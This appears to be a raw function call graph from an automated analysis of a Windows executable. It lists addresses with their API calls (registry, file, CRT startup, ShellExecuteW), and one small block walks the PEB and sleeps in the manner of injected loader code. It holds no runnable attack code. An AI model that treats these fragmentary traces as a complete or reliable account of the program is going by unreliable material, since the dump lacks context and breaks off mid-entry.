API calls 85925->85926 85926->85925 85927->85910 85953 413801 85928->85953 85983 419efd 85931->85983 85935 4115d7 52 API calls 85934->85935 85936 40bc98 85935->85936 85937 4115d7 52 API calls 85936->85937 85938 40bca6 85937->85938 85939 40e4c0 85938->85939 85995 403350 85939->85995 85941 40e4cb RegOpenKeyExW 85942 427190 RegQueryValueExW 85941->85942 85943 40e4eb 85941->85943 85944 4271b0 85942->85944 85945 42721a RegCloseKey 85942->85945 85943->85925 85946 4115d7 52 API calls 85944->85946 85945->85925 85947 4271cb 85946->85947 86002 43652f 52 API calls 85947->86002 85949 4271d8 RegQueryValueExW 85950 42720e 85949->85950 85951 4271f7 85949->85951 85950->85945 85952 402160 52 API calls 85951->85952 85952->85950 85960 41381a 85953->85960 85971 41389e 85953->85971 85954 4139e8 85980 417f77 46 API calls __getptd_noexit 85954->85980 85956 413a00 85982 417f77 46 API calls __getptd_noexit 85956->85982 85957 4139ed 85981 417f25 10 API calls __lseeki64 85957->85981 85966 41388a 85960->85966 85960->85971 85975 419e30 46 API calls __lseeki64 85960->85975 85962 41396c 85964 413967 85962->85964 85967 41397a 85962->85967 85962->85971 85963 413929 85965 413945 85963->85965 85963->85971 85977 419e30 46 API calls __lseeki64 85963->85977 85964->85915 85965->85964 85970 41395b 85965->85970 85965->85971 85966->85971 85974 413909 85966->85974 85976 419e30 46 API calls __lseeki64 85966->85976 85979 419e30 46 API calls __lseeki64 85967->85979 85978 419e30 46 API calls __lseeki64 85970->85978 85971->85954 85971->85956 85974->85962 85974->85963 85975->85966 85976->85974 85977->85965 85978->85964 85979->85964 85980->85957 85981->85964 85982->85964 85984 419f13 85983->85984 85985 419f0e 85983->85985 85992 417f77 46 API calls __getptd_noexit 85984->85992 85985->85984 85988 419f2b 85985->85988 85987 419f18 85993 417f25 10 API calls __lseeki64 85987->85993 85991 40e454 85988->85991 85994 417f77 46 API calls __getptd_noexit 85988->85994 85991->85918 85992->85987 85993->85991 85994->85987 85996 403367 85995->85996 85997 403358 85995->85997 85998 4115d7 52 API calls 85996->85998 85997->85941 85999 403370 85998->85999 86000 4115d7 52 API calls 85999->86000 86001 40339e 86000->86001 86001->85941 86002->85949 86003 3eb4ff8 86017 3eb2c48 86003->86017 86005 3eb50e5 86020 3eb4ee8 86005->86020 86023 3eb6108 GetPEB 86017->86023 86019 3eb32d3 86019->86005 86021 3eb4ef1 Sleep 86020->86021 86022 3eb4eff 86021->86022 86024 3eb6132 86023->86024 86024->86019 86025 416454 86062 416c70 86025->86062 86027 416460 GetStartupInfoW 86028 416474 86027->86028 86063 419d5a HeapCreate 86028->86063 86030 4164cd 86031 4164d8 86030->86031 86146 41642b 46 API calls 3 library calls 86030->86146 86064 417c20 GetModuleHandleW 86031->86064 86034 4164de 86035 4164e9 __RTC_Initialize 86034->86035 86147 41642b 46 API calls 3 library calls 86034->86147 86083 41aaa1 GetStartupInfoW 86035->86083 86039 416503 GetCommandLineW 86096 41f584 GetEnvironmentStringsW 86039->86096 86042 416513 86102 41f4d6 GetModuleFileNameW 86042->86102 86045 41651d 86046 416528 86045->86046 86149 411924 46 API calls 3 library calls 86045->86149 86106 41f2a4 86046->86106 86049 41652e 86052 416539 86049->86052 86150 411924 46 API calls 3 library calls 86049->86150 86120 411703 86052->86120 86053 416541 86055 41654c __wwincmdln 86053->86055 86151 411924 46 API calls 3 library calls 86053->86151 86124 40d6b0 86055->86124 86058 41657c 86153 411906 46 API calls _doexit 86058->86153 86061 416581 __tzset_nolock 86062->86027 86063->86030 86065 417c34 86064->86065 86066 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86064->86066 86154 4178ff 49 API calls _free 86065->86154 86068 417c87 TlsAlloc 86066->86068 86071 417cd5 TlsSetValue 86068->86071 86072 417d96 86068->86072 86069 417c39 86069->86034 86071->86072 86073 417ce6 __init_pointers 86071->86073 86072->86034 86155 418151 InitializeCriticalSectionAndSpinCount 86073->86155 86075 417d91 86163 4178ff 49 API calls _free 86075->86163 86077 417d2a 86077->86075 86156 416b49 86077->86156 86080 417d76 86162 41793c 46 API calls 4 library calls 86080->86162 86082 417d7e GetCurrentThreadId 86082->86072 86084 416b49 __calloc_crt 46 API calls 86083->86084 86093 41aabf 86084->86093 86085 41ac6a GetStdHandle 86090 41ac34 86085->86090 86086 416b49 __calloc_crt 46 API calls 86086->86093 86087 41acce SetHandleCount 86095 4164f7 86087->86095 86088 41ac7c GetFileType 86088->86090 86089 41abb4 86089->86090 86091 41abe0 GetFileType 86089->86091 86092 41abeb InitializeCriticalSectionAndSpinCount 86089->86092 86090->86085 86090->86087 86090->86088 86094 41aca2 InitializeCriticalSectionAndSpinCount 86090->86094 86091->86089 86091->86092 86092->86089 86092->86095 86093->86086 86093->86089 86093->86090 86093->86095 86094->86090 86094->86095 86095->86039 86148 411924 46 API calls 3 library calls 86095->86148 86097 41f595 86096->86097 86098 41f599 86096->86098 86097->86042 86098->86098 86173 416b04 86098->86173 86100 41f5bb _memmove 86101 41f5c2 FreeEnvironmentStringsW 86100->86101 86101->86042 86103 41f50b _wparse_cmdline 86102->86103 86104 416b04 __malloc_crt 46 API calls 86103->86104 86105 41f54e _wparse_cmdline 86103->86105 86104->86105 86105->86045 86107 41f2bc _wcslen 86106->86107 86111 41f2b4 86106->86111 86108 416b49 __calloc_crt 46 API calls 86107->86108 86113 41f2e0 _wcslen 86108->86113 86109 41f336 86180 413748 86109->86180 86111->86049 86112 416b49 __calloc_crt 46 API calls 86112->86113 86113->86109 86113->86111 86113->86112 86114 41f35c 86113->86114 86117 41f373 86113->86117 86179 41ef12 46 API calls __lseeki64 86113->86179 86116 413748 _free 46 API calls 86114->86116 86116->86111 86186 417ed3 86117->86186 86119 41f37f 86119->86049 86121 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86120->86121 86123 411750 __IsNonwritableInCurrentImage 86121->86123 86205 41130a 51 API calls __cinit 86121->86205 86123->86053 86125 42e2f3 86124->86125 86126 40d6cc 86124->86126 86206 408f40 86126->86206 86128 40d707 86210 40ebb0 86128->86210 86133 40d737 86213 411951 86133->86213 86136 40d751 86225 40f4e0 SystemParametersInfoW SystemParametersInfoW 86136->86225 86138 40d75f 86226 40d590 GetCurrentDirectoryW 86138->86226 86140 40d767 SystemParametersInfoW 86141 40d78d 86140->86141 86142 408f40 VariantClear 86141->86142 86143 40d79d 86142->86143 86144 408f40 VariantClear 86143->86144 86145 40d7a6 86144->86145 86145->86058 86152 4118da 46 API calls _doexit 86145->86152 86146->86031 86147->86035 86152->86058 86153->86061 86154->86069 86155->86077 86158 416b52 86156->86158 86159 416b8f 86158->86159 86160 416b70 Sleep 86158->86160 86164 41f677 86158->86164 86159->86075 86159->86080 86161 416b85 86160->86161 86161->86158 86161->86159 86162->86082 86163->86072 86165 41f683 86164->86165 86171 41f69e _malloc 86164->86171 86166 41f68f 86165->86166 86165->86171 86172 417f77 46 API calls __getptd_noexit 86166->86172 86168 41f6b1 HeapAlloc 86170 41f6d8 86168->86170 86168->86171 86169 41f694 86169->86158 86170->86158 86171->86168 86171->86170 86172->86169 86176 416b0d 86173->86176 86174 4135bb _malloc 45 API calls 86174->86176 86175 416b43 86175->86100 86176->86174 86176->86175 86177 416b24 Sleep 86176->86177 86178 416b39 86177->86178 86178->86175 86178->86176 86179->86113 86181 41377c __dosmaperr 86180->86181 86182 413753 RtlFreeHeap 86180->86182 86181->86111 86182->86181 86183 413768 86182->86183 86189 417f77 46 API calls __getptd_noexit 86183->86189 86185 41376e GetLastError 86185->86181 86190 417daa 86186->86190 86189->86185 86191 417dc9 setSBCS __call_reportfault 86190->86191 86192 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86191->86192 86195 417eb5 __call_reportfault 86192->86195 86194 417ed1 GetCurrentProcess TerminateProcess 86194->86119 86196 41a208 86195->86196 86197 41a210 86196->86197 86198 41a212 IsDebuggerPresent 86196->86198 86197->86194 86204 41fe19 86198->86204 86201 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86202 421ff8 GetCurrentProcess TerminateProcess 86201->86202 86203 421ff0 __call_reportfault 86201->86203 86202->86194 86203->86202 86204->86201 86205->86123 86207 408f48 moneypunct 86206->86207 86208 4265c7 VariantClear 86207->86208 86209 408f55 moneypunct 86207->86209 86208->86209 86209->86128 86266 40ebd0 86210->86266 86270 4182cb 86213->86270 86215 41195e 86277 4181f2 LeaveCriticalSection 86215->86277 86217 40d748 86218 4119b0 86217->86218 86219 4119d6 86218->86219 86220 4119bc 86218->86220 86219->86136 86220->86219 86312 417f77 46 API calls __getptd_noexit 86220->86312 86222 4119c6 86313 417f25 10 API calls __lseeki64 86222->86313 86224 4119d1 86224->86136 86225->86138 86314 401f20 86226->86314 86228 40d5b6 IsDebuggerPresent 86229 40d5c4 86228->86229 86230 42e1bb MessageBoxA 86228->86230 86231 42e1d4 86229->86231 86232 40d5e3 86229->86232 86230->86231 86487 403a50 52 API calls 3 library calls 86231->86487 86384 40f520 86232->86384 86236 40d5fd GetFullPathNameW 86396 401460 86236->86396 86238 40d63b 86239 40d643 86238->86239 86240 42e231 SetCurrentDirectoryW 86238->86240 86241 40d64c 86239->86241 86488 432fee 6 API calls 86239->86488 86240->86239 86411 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86241->86411 86244 42e252 86244->86241 86246 42e25a GetModuleFileNameW 86244->86246 86248 42e274 86246->86248 86249 42e2cb GetForegroundWindow ShellExecuteW 86246->86249 86489 401b10 86248->86489 86252 40d688 86249->86252 86250 40d656 86251 40d669 86250->86251 86485 40e0c0 74 API calls setSBCS 86250->86485 86419 4091e0 86251->86419 86258 40d692 SetCurrentDirectoryW 86252->86258 86258->86140 86260 42e28d 86496 40d200 52 API calls 2 library calls 86260->86496 86263 42e299 GetForegroundWindow ShellExecuteW 86264 42e2c6 86263->86264 86264->86252 86265 40ec00 LoadLibraryA GetProcAddress 86265->86133 86267 40d72e 86266->86267 86268 40ebd6 LoadLibraryA 86266->86268 86267->86133 86267->86265 86268->86267 86269 40ebe7 GetProcAddress 86268->86269 86269->86267 86271 4182e0 86270->86271 86272 4182f3 EnterCriticalSection 86270->86272 86278 418209 86271->86278 86272->86215 86274 4182e6 86274->86272 86305 411924 46 API calls 3 library calls 86274->86305 86277->86217 86279 418215 __tzset_nolock 86278->86279 86280 418225 86279->86280 86281 41823d 86279->86281 86306 418901 46 API calls __NMSG_WRITE 86280->86306 86284 416b04 __malloc_crt 45 API calls 86281->86284 86295 41824b __tzset_nolock 86281->86295 86283 41822a 86307 418752 46 API calls 5 library calls 86283->86307 86286 418256 86284->86286 86288 41825d 86286->86288 86289 41826c 86286->86289 86287 418231 86308 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86287->86308 86309 417f77 46 API calls __getptd_noexit 86288->86309 86292 4182cb __lock 45 API calls 86289->86292 86293 418273 86292->86293 86296 4182a6 86293->86296 86297 41827b InitializeCriticalSectionAndSpinCount 86293->86297 86295->86274 86300 413748 _free 45 API calls 86296->86300 86298 418297 86297->86298 86299 41828b 86297->86299 86311 4182c2 LeaveCriticalSection _doexit 86298->86311 86301 413748 _free 45 API calls 86299->86301 86300->86298 86302 418291 86301->86302 86310 417f77 46 API calls __getptd_noexit 86302->86310 86306->86283 86307->86287 86309->86295 86310->86298 86311->86295 86312->86222 86313->86224 86497 40e6e0 86314->86497 86318 401f41 GetModuleFileNameW 86515 410100 86318->86515 86320 401f5c 86527 410960 86320->86527 86323 401b10 52 API calls 86324 401f81 86323->86324 86530 401980 86324->86530 86326 401f8e 86327 408f40 VariantClear 86326->86327 86328 401f9d 86327->86328 86329 401b10 52 API calls 86328->86329 86330 401fb4 86329->86330 86331 401980 53 API calls 86330->86331 86332 401fc3 86331->86332 86333 401b10 52 API calls 86332->86333 86334 401fd2 86333->86334 86538 40c2c0 86334->86538 86336 401fe1 86337 40bc70 52 API calls 86336->86337 86338 401ff3 86337->86338 86556 401a10 86338->86556 86340 401ffe 86563 4114ab 86340->86563 86343 428b05 86345 401a10 52 API calls 86343->86345 86344 402017 86346 4114ab __wcsicoll 58 API calls 86344->86346 86347 428b18 86345->86347 86348 402022 86346->86348 86350 401a10 52 API calls 86347->86350 86348->86347 86349 40202d 86348->86349 86351 4114ab __wcsicoll 58 API calls 86349->86351 86352 428b33 86350->86352 86353 402038 86351->86353 86355 428b3b GetModuleFileNameW 86352->86355 86354 402043 86353->86354 86353->86355 86356 4114ab __wcsicoll 58 API calls 86354->86356 86357 401a10 52 API calls 86355->86357 86358 40204e 86356->86358 86359 428b6c 86357->86359 86360 402092 86358->86360 86364 401a10 52 API calls 86358->86364 86369 428b90 _wcscpy 86358->86369 86575 40e0a0 52 API calls 86359->86575 86363 4020a3 86360->86363 86360->86369 86362 428b7a 86365 401a10 52 API calls 86362->86365 86366 428bc6 86363->86366 86571 40e830 53 API calls 86363->86571 86367 402073 _wcscpy 86364->86367 86368 428b88 86365->86368 86375 401a10 52 API calls 86367->86375 86368->86369 86372 401a10 52 API calls 86369->86372 86371 4020bb 86572 40cf00 53 API calls 86371->86572 86379 4020d0 86372->86379 86374 4020c6 86376 408f40 VariantClear 86374->86376 86375->86360 86376->86379 86377 402110 86381 408f40 VariantClear 86377->86381 86379->86377 86382 401a10 52 API calls 86379->86382 86573 40cf00 53 API calls 86379->86573 86574 40e6a0 53 API calls 86379->86574 86383 402120 moneypunct 86381->86383 86382->86379 86383->86228 86385 4295c9 setSBCS 86384->86385 86386 40f53c 86384->86386 86388 4295d9 GetOpenFileNameW 86385->86388 87276 410120 86386->87276 86388->86386 86390 40d5f5 86388->86390 86389 40f545 87280 4102b0 SHGetMalloc 86389->87280 86390->86236 86390->86238 86392 40f54c 87285 410190 GetFullPathNameW 86392->87285 86394 40f559 87296 40f570 86394->87296 87358 402400 86396->87358 86398 40146f 86401 428c29 _wcscat 86398->86401 87367 401500 86398->87367 86400 40147c 86400->86401 87375 40d440 86400->87375 86403 401489 86403->86401 86404 401491 GetFullPathNameW 86403->86404 86405 402160 52 API calls 86404->86405 86406 4014bb 86405->86406 86407 402160 52 API calls 86406->86407 86408 4014c8 86407->86408 86408->86401 86409 402160 52 API calls 86408->86409 86410 4014ee 86409->86410 86410->86238 86412 428361 86411->86412 86413 4103fc LoadImageW RegisterClassExW 86411->86413 87447 44395e EnumResourceNamesW LoadImageW 86412->87447 87446 410490 7 API calls 86413->87446 86416 40d651 86418 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86416->86418 86417 428368 86418->86250 86420 409202 86419->86420 86421 42d7ad 86419->86421 86476 409216 moneypunct 86420->86476 87719 410940 336 API calls 86420->87719 87722 45e737 90 API calls 3 library calls 86421->87722 86424 40939c 86424->86252 86486 401000 Shell_NotifyIconW setSBCS 86424->86486 86426 4095b2 86426->86424 86428 4095bf 86426->86428 86427 409253 PeekMessageW 86427->86476 87721 401a50 336 API calls 86428->87721 86429 40d410 VariantClear 86429->86476 86431 42d8cd Sleep 86431->86476 86432 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86432->86424 86435 4095f9 86432->86435 86434 42e13b 87741 40d410 VariantClear 86434->87741 86438 42e158 TranslateMessage DispatchMessageW GetMessageW 86435->86438 86438->86438 86440 42e188 86438->86440 86439 409386 86439->86424 87720 40f190 10 API calls 86439->87720 86440->86424 86442 409567 PeekMessageW 86442->86476 86444 44c29d 52 API calls 86484 4094e0 86444->86484 86445 46f3c1 107 API calls 86445->86476 86447 46fdbf 108 API calls 86447->86484 86448 409551 TranslateMessage DispatchMessageW 86448->86442 86450 42dcd2 WaitForSingleObject 86452 42dcf0 GetExitCodeProcess CloseHandle 86450->86452 86450->86476 86451 42dd3d Sleep 86451->86484 87730 40d410 VariantClear 86452->87730 86456 4094cf Sleep 86456->86484 86458 42d94d timeGetTime 87726 465124 53 API calls 86458->87726 86460 40c620 timeGetTime 86460->86484 86463 465124 53 API calls 86463->86484 86464 42dd89 CloseHandle 86464->86484 86465 47d33e 314 API calls 86465->86476 86467 42de19 GetExitCodeProcess CloseHandle 86467->86484 86468 408f40 VariantClear 86468->86484 86471 42de88 Sleep 86471->86476 86476->86427 86476->86429 86476->86431 86476->86434 86476->86439 86476->86442 86476->86445 86476->86448 86476->86450 86476->86451 86476->86456 86476->86458 86476->86465 86477 42e0cc VariantClear 86476->86477 86478 408f40 VariantClear 86476->86478 86479 45e737 90 API calls 86476->86479 86476->86484 87448 4091b0 86476->87448 87506 40afa0 86476->87506 87532 4096a0 86476->87532 87659 408fc0 86476->87659 87694 408cc0 86476->87694 87708 40d150 86476->87708 87713 40d170 86476->87713 87723 465124 53 API calls 86476->87723 87724 40e0a0 52 API calls 86476->87724 87725 40c620 timeGetTime 86476->87725 87740 40e270 VariantClear moneypunct 86476->87740 86477->86476 86478->86476 86479->86476 86481 401b10 52 API calls 86481->86484 86482 401980 53 API calls 86482->86484 86484->86444 86484->86447 86484->86460 86484->86463 86484->86464 86484->86467 86484->86468 86484->86471 86484->86476 86484->86481 86484->86482 87727 45178a 54 API calls 86484->87727 87728 47d33e 336 API calls 86484->87728 87729 453bc6 54 API calls 86484->87729 87731 40d410 VariantClear 86484->87731 87732 443d19 67 API calls _wcslen 86484->87732 87733 4574b4 VariantClear 86484->87733 87734 403cd0 86484->87734 87738 4731e1 VariantClear 86484->87738 87739 4331a2 6 API calls 86484->87739 86485->86251 86486->86252 86487->86238 86488->86244 86490 401b16 _wcslen 86489->86490 86491 4115d7 52 API calls 86490->86491 86493 401b63 86490->86493 86492 401b4b _memmove 86491->86492 86494 4115d7 52 API calls 86492->86494 86495 40d200 52 API calls 2 library calls 86493->86495 86494->86493 86495->86260 86496->86263 86498 40bc70 52 API calls 86497->86498 86499 401f31 86498->86499 86500 402560 86499->86500 86501 40256d __write_nolock 86500->86501 86502 402160 52 API calls 86501->86502 86504 402593 86502->86504 86514 4025bd 86504->86514 86576 401c90 86504->86576 86505 4026f0 52 API calls 86505->86514 86506 4026a7 86507 401b10 52 API calls 86506->86507 86513 4026db 86506->86513 86509 4026d1 86507->86509 86508 401b10 52 API calls 86508->86514 86580 40d7c0 52 API calls 2 library calls 86509->86580 86510 401c90 52 API calls 86510->86514 86513->86318 86514->86505 86514->86506 86514->86508 86514->86510 86579 40d7c0 52 API calls 2 library calls 86514->86579 86581 40f760 86515->86581 86518 410118 86518->86320 86520 42805d 86521 42806a 86520->86521 86637 431e58 86520->86637 86523 413748 _free 46 API calls 86521->86523 86524 428078 86523->86524 86525 431e58 82 API calls 86524->86525 86526 428084 86525->86526 86526->86320 86528 4115d7 52 API calls 86527->86528 86529 401f74 86528->86529 86529->86323 86531 4019a3 86530->86531 86532 401985 86530->86532 86531->86532 86533 4019b8 86531->86533 86535 40199f 86532->86535 87242 403e10 86532->87242 86534 403e10 53 API calls 86533->86534 86537 4019c4 86534->86537 86535->86326 86537->86326 86539 40c2c7 86538->86539 86540 40c30e 86538->86540 86541 40c2d3 86539->86541 86542 426c79 86539->86542 86543 40c315 86540->86543 86544 426c2b 86540->86544 87266 403ea0 52 API calls __cinit 86541->87266 87271 4534e3 52 API calls 86542->87271 86547 40c321 86543->86547 86551 426c5a 86543->86551 86546 426c4b 86544->86546 86548 426c2e 86544->86548 87269 4534e3 52 API calls 86546->87269 87267 403ea0 52 API calls __cinit 86547->87267 86555 40c2de 86548->86555 87268 4534e3 52 API calls 86548->87268 87270 4534e3 52 API calls 86551->87270 86555->86336 86557 401a30 86556->86557 86558 401a17 86556->86558 86560 402160 52 API calls 86557->86560 86559 401a2d 86558->86559 87272 403c30 52 API calls _memmove 86558->87272 86559->86340 86562 401a3d 86560->86562 86562->86340 86564 411523 86563->86564 86565 4114ba 86563->86565 87275 4113a8 58 API calls 3 library calls 86564->87275 86570 40200c 86565->86570 87273 417f77 46 API calls __getptd_noexit 86565->87273 86568 4114c6 87274 417f25 10 API calls __lseeki64 86568->87274 86570->86343 86570->86344 86571->86371 86572->86374 86573->86379 86574->86379 86575->86362 86577 4026f0 52 API calls 86576->86577 86578 401c97 86577->86578 86578->86504 86579->86514 86580->86513 86641 40f6f0 86581->86641 86583 40f77b _strcat moneypunct 86649 40f850 86583->86649 86585 40f7ab 86585->86585 86653 4149c2 86585->86653 86588 427c2a 86678 414d04 86588->86678 86590 40f7fc 86590->86588 86591 40f804 86590->86591 86665 414a46 86591->86665 86595 40f80e 86595->86518 86600 4528bd 86595->86600 86597 427c59 86684 414fe2 86597->86684 86599 427c79 86601 4150d1 _fseek 81 API calls 86600->86601 86602 452930 86601->86602 87184 452719 86602->87184 86605 452948 86605->86520 86606 414d04 __fread_nolock 61 API calls 86607 452966 86606->86607 86608 414d04 __fread_nolock 61 API calls 86607->86608 86609 452976 86608->86609 86610 414d04 __fread_nolock 61 API calls 86609->86610 86611 45298f 86610->86611 86612 414d04 __fread_nolock 61 API calls 86611->86612 86613 4529aa 86612->86613 86614 4150d1 _fseek 81 API calls 86613->86614 86615 4529c4 86614->86615 86616 4135bb _malloc 46 API calls 86615->86616 86617 4529cf 86616->86617 86618 4135bb _malloc 46 API calls 86617->86618 86619 4529db 86618->86619 86620 414d04 __fread_nolock 61 API calls 86619->86620 86621 4529ec 86620->86621 86622 44afef GetSystemTimeAsFileTime 86621->86622 86623 452a00 86622->86623 86624 452a36 86623->86624 86625 452a13 86623->86625 86626 452aa5 86624->86626 86627 452a3c 86624->86627 86628 413748 _free 46 API calls 86625->86628 86630 413748 _free 46 API calls 86626->86630 87190 44b1a9 86627->87190 86631 452a1c 86628->86631 86633 452aa3 86630->86633 86634 413748 _free 46 API calls 86631->86634 86632 452a9d 86635 413748 _free 46 API calls 86632->86635 86633->86520 86636 452a25 86634->86636 86635->86633 86636->86520 86638 431e64 86637->86638 86639 431e6a 86637->86639 86640 414a46 __fcloseall 82 API calls 86638->86640 86639->86521 86640->86639 86642 425de2 86641->86642 86644 40f6fc _wcslen 86641->86644 86642->86583 86643 40f710 WideCharToMultiByte 86645 40f756 86643->86645 86646 40f728 86643->86646 86644->86643 86645->86583 86647 4115d7 52 API calls 86646->86647 86648 40f735 WideCharToMultiByte 86647->86648 86648->86583 86651 40f85d setSBCS _strlen 86649->86651 86652 40f9c6 86651->86652 86697 414db8 86651->86697 86652->86585 86712 414904 86653->86712 86655 40f7e9 86655->86588 86656 40f5c0 86655->86656 86657 40f5cd _strcat __write_nolock _memmove 86656->86657 86658 414d04 __fread_nolock 61 API calls 86657->86658 86660 425d11 86657->86660 86664 40f691 __tzset_nolock 86657->86664 86800 4150d1 86657->86800 86658->86657 86661 4150d1 _fseek 81 API calls 86660->86661 86662 425d33 86661->86662 86663 414d04 __fread_nolock 61 API calls 86662->86663 86663->86664 86664->86590 86666 414a52 __tzset_nolock 86665->86666 86667 414a64 86666->86667 86668 414a79 86666->86668 86940 417f77 46 API calls __getptd_noexit 86667->86940 86670 415471 __lock_file 47 API calls 86668->86670 86673 414a74 __tzset_nolock 86668->86673 86674 414a92 86670->86674 86671 414a69 86941 417f25 10 API calls __lseeki64 86671->86941 86673->86595 86924 4149d9 86674->86924 87009 414c76 86678->87009 86680 414d1c 86681 44afef 86680->86681 87177 442c5a 86681->87177 86683 44b00d 86683->86597 86685 414fee __tzset_nolock 86684->86685 86686 414ffa 86685->86686 86687 41500f 86685->86687 87181 417f77 46 API calls __getptd_noexit 86686->87181 86689 415471 __lock_file 47 API calls 86687->86689 86691 415017 86689->86691 86690 414fff 87182 417f25 10 API calls __lseeki64 86690->87182 86693 414e4e __ftell_nolock 51 API calls 86691->86693 86694 415024 86693->86694 87183 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 86694->87183 86696 41500a __tzset_nolock 86696->86599 86698 414dd6 86697->86698 86699 414deb 86697->86699 86708 417f77 46 API calls __getptd_noexit 86698->86708 86699->86698 86701 414df2 86699->86701 86710 41b91b 79 API calls 12 library calls 86701->86710 86702 414ddb 86709 417f25 10 API calls __lseeki64 86702->86709 86705 414e18 86706 414de6 86705->86706 86711 418f98 77 API calls 4 library calls 86705->86711 86706->86651 86708->86702 86709->86706 86710->86705 86711->86706 86715 414910 __tzset_nolock 86712->86715 86713 414923 86768 417f77 46 API calls __getptd_noexit 86713->86768 86715->86713 86717 414951 86715->86717 86716 414928 86769 417f25 10 API calls __lseeki64 86716->86769 86731 41d4d1 86717->86731 86720 414956 86721 41496a 86720->86721 86722 41495d 86720->86722 86724 414992 86721->86724 86725 414972 86721->86725 86770 417f77 46 API calls __getptd_noexit 86722->86770 86748 41d218 86724->86748 86771 417f77 46 API calls __getptd_noexit 86725->86771 86727 414933 __tzset_nolock @_EH4_CallFilterFunc@8 86727->86655 86732 41d4dd __tzset_nolock 86731->86732 86733 4182cb __lock 46 API calls 86732->86733 86739 41d4eb 86733->86739 86734 41d567 86736 416b04 __malloc_crt 46 API calls 86734->86736 86738 41d56e 86736->86738 86737 41d5f0 __tzset_nolock 86737->86720 86740 41d57c InitializeCriticalSectionAndSpinCount 86738->86740 86746 41d560 86738->86746 86739->86734 86743 418209 __mtinitlocknum 46 API calls 86739->86743 86739->86746 86776 4154b2 47 API calls __lock 86739->86776 86777 415520 LeaveCriticalSection LeaveCriticalSection _doexit 86739->86777 86741 41d59c 86740->86741 86742 41d5af EnterCriticalSection 86740->86742 86745 413748 _free 46 API calls 86741->86745 86742->86746 86743->86739 86745->86746 86773 41d5fb 86746->86773 86750 41d23a 86748->86750 86749 41d26c __wopenfile 86755 41d47a 86749->86755 86767 41d421 86749->86767 86784 41341f 58 API calls 2 library calls 86749->86784 86750->86749 86751 41d255 86750->86751 86782 417f77 46 API calls __getptd_noexit 86751->86782 86753 41d25a 86783 417f25 10 API calls __lseeki64 86753->86783 86787 417f77 46 API calls __getptd_noexit 86755->86787 86756 41d48c 86779 422bf9 86756->86779 86758 41499d 86772 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 86758->86772 86760 41d47f 86788 417f25 10 API calls __lseeki64 86760->86788 86763 41d41a 86763->86767 86785 41341f 58 API calls 2 library calls 86763->86785 86765 41d439 86765->86767 86786 41341f 58 API calls 2 library calls 86765->86786 86767->86755 86767->86756 86768->86716 86769->86727 86770->86727 86771->86727 86772->86727 86778 4181f2 LeaveCriticalSection 86773->86778 86775 41d602 86775->86737 86776->86739 86777->86739 86778->86775 86789 422b35 86779->86789 86781 422c14 86781->86758 86782->86753 86783->86758 86784->86763 86785->86765 86786->86767 86787->86760 86788->86758 86790 422b41 __tzset_nolock 86789->86790 86791 422b54 86790->86791 86793 422b8a 86790->86793 86792 417f77 __lseeki64 46 API calls 86791->86792 86794 422b59 86792->86794 86795 422400 __tsopen_nolock 109 API calls 86793->86795 86796 417f25 __lseeki64 10 API calls 86794->86796 86797 422ba4 86795->86797 86799 422b63 __tzset_nolock 86796->86799 86798 422bcb __wsopen_helper LeaveCriticalSection 86797->86798 86798->86799 86799->86781 86803 4150dd __tzset_nolock 86800->86803 86801 4150e9 86831 417f77 46 API calls __getptd_noexit 86801->86831 86803->86801 86804 41510f 86803->86804 86813 415471 86804->86813 86805 4150ee 86832 417f25 10 API calls __lseeki64 86805->86832 86812 4150f9 __tzset_nolock 86812->86657 86814 415483 86813->86814 86815 4154a5 EnterCriticalSection 86813->86815 86814->86815 86817 41548b 86814->86817 86816 415117 86815->86816 86819 415047 86816->86819 86818 4182cb __lock 46 API calls 86817->86818 86818->86816 86820 415067 86819->86820 86821 415057 86819->86821 86826 415079 86820->86826 86834 414e4e 86820->86834 86889 417f77 46 API calls __getptd_noexit 86821->86889 86825 41505c 86833 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 86825->86833 86851 41443c 86826->86851 86829 4150b9 86864 41e1f4 86829->86864 86831->86805 86832->86812 86833->86812 86835 414e61 86834->86835 86836 414e79 86834->86836 86890 417f77 46 API calls __getptd_noexit 86835->86890 86837 414139 __stbuf 46 API calls 86836->86837 86841 414e80 86837->86841 86839 414e66 86891 417f25 10 API calls __lseeki64 86839->86891 86842 41e1f4 __write 51 API calls 86841->86842 86843 414e97 86842->86843 86844 414f09 86843->86844 86846 414ec9 86843->86846 86850 414e71 86843->86850 86892 417f77 46 API calls __getptd_noexit 86844->86892 86847 41e1f4 __write 51 API calls 86846->86847 86846->86850 86848 414f64 86847->86848 86849 41e1f4 __write 51 API calls 86848->86849 86848->86850 86849->86850 86850->86826 86852 414477 86851->86852 86853 414455 86851->86853 86857 414139 86852->86857 86853->86852 86854 414139 __stbuf 46 API calls 86853->86854 86855 414470 86854->86855 86893 41b7b2 77 API calls 5 library calls 86855->86893 86858 414145 86857->86858 86859 41415a 86857->86859 86894 417f77 46 API calls __getptd_noexit 86858->86894 86859->86829 86861 41414a 86895 417f25 10 API calls __lseeki64 86861->86895 86863 414155 86863->86829 86865 41e200 __tzset_nolock 86864->86865 86866 41e223 86865->86866 86867 41e208 86865->86867 86869 41e22f 86866->86869 86872 41e269 86866->86872 86916 417f8a 46 API calls __getptd_noexit 86867->86916 86918 417f8a 46 API calls __getptd_noexit 86869->86918 86870 41e20d 86917 417f77 46 API calls __getptd_noexit 86870->86917 86896 41ae56 86872->86896 86874 41e234 86919 417f77 46 API calls __getptd_noexit 86874->86919 86876 41e215 __tzset_nolock 86876->86825 86878 41e23c 86920 417f25 10 API calls __lseeki64 86878->86920 86879 41e26f 86881 41e291 86879->86881 86882 41e27d 86879->86882 86921 417f77 46 API calls __getptd_noexit 86881->86921 86906 41e17f 86882->86906 86885 41e289 86923 41e2c0 LeaveCriticalSection __unlock_fhandle 86885->86923 86886 41e296 86922 417f8a 46 API calls __getptd_noexit 86886->86922 86889->86825 86890->86839 86891->86850 86892->86850 86893->86852 86894->86861 86895->86863 86897 41ae62 